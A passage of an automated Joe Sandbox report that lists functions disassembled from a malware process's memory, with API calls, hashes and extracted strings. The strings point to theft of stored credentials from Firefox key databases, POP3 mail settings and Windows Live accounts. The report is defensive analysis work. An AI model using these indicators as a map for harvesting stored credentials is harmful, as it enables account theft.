                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                          • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                          • API String ID: 945165440-3589380929
                                                                                                                                                                                          • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                          • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004036D7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                            • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                          • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040376A
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                          • API String ID: 500647785-4097000612
                                                                                                                                                                                          • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                          • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409213 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00409239
                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                          • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                                                                                          • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                          • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405972 Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$DialogMessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2485852401-0
                                                                                                                                                                                          • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                          • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B0EB Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3642520215-0
                                                                                                                                                                                          • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                          • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405BBD Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                          • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                          • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040690E Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 85stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                          • String ID: C@$key3.db$key4.db
                                                                                                                                                                                          • API String ID: 581844971-2841947474
                                                                                                                                                                                          • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                          • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                                                          • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B86F Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2126104762-0
                                                                                                                                                                                          • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                          • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                          • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407065 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1999381814-0
                                                                                                                                                                                          • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                          • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004258DC Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 438COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                                                                                          • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                          • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D7EA Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                          • String ID: user_pref("
                                                                                                                                                                                          • API String ID: 765841271-2487180061
                                                                                                                                                                                          • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                          • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004057FC Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                          • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                          • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                          • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                                                          • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A596 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                          • API String ID: 1631269929-4153097237
                                                                                                                                                                                          • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                          • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408B27 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                          • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • strings, xrefs: 00408B98
                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                          • API String ID: 4036804644-4125592482
                                                                                                                                                                                          • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                          • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407E63 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,769CE430,?), ref: 00407F2F
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                                                                                          • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                          • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409123 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                                                                                          • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                          • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407446 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
